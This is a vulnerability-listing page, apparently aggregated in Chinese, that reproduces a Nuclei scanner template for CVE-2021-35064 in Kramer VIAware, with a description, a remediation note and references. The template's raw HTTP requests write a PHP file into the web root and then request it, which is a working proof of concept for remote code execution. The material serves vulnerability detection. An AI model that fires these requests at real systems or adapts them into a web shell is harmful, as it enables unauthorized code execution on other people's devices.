CVE-2021-35064: Kramer VIAware - Privilege Escalation and Remote Code Execution

日期: 2025-08-01 | 影响软件: Kramer VIAware | POC: 已公开

漏洞描述

Kramer VIAware, all tested versions, allow privilege escalation and remote code execution due to misconfigured sudo permissions. Attackers can execute arbitrary system commands remotely if the web interface is accessible, due to vulnerabilities in the handling of privileged operations through ajaxPages/writeBrowseFilePathAjax.php and improper sudoers configurations.

PoC代码[已公开]

id: CVE-2021-35064

info:
  name: Kramer VIAware - Privilege Escalation and Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Kramer VIAware, all tested versions, allow privilege escalation and remote code execution due to misconfigured sudo permissions. Attackers can execute arbitrary system commands remotely if the web interface is accessible, due to vulnerabilities in the handling of privileged operations through ajaxPages/writeBrowseFilePathAjax.php and improper sudoers configurations.
  remediation: |
    Apply the latest firmware update provided by Kramer to fix misconfigured sudoers permissions and ensure proper validation in the web interface.
  reference:
    - http://packetstormsecurity.com/files/166623/Kramer-VIAware-Remote-Code-Execution.html
    - https://www.kramerav.com/us/product/viaware
    - https://www.exploit-db.com/exploits/50856
    - https://write-up.github.io/kramerav/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35064
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-35064
    cwe-id: CWE-269
    epss-score: 0.85692
    epss-percentile: 0.99328
    cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: kramerav
    product: viaware
    fofa-query: icon_hash="1521468900"
  tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev,vuln

variables:
  useragent: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        radioBtnVal=%3C%3Fphp+echo+md5%28%22CVE-2021-35064%22%29%3B+%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php

      - |
        GET /{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "44f63b292601ec4ab0d8c3244c9f5ebe"
# digest: 4b0a0048304602210082d3ce25e2ec9736a4043d5a60bf2f52a268145bcf32eac3fc332d526867ae570221008838efee4368e8785df287b432650a1b775e1b44a151c83bee7a6b32a504443f:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-35064.yaml

相关漏洞推荐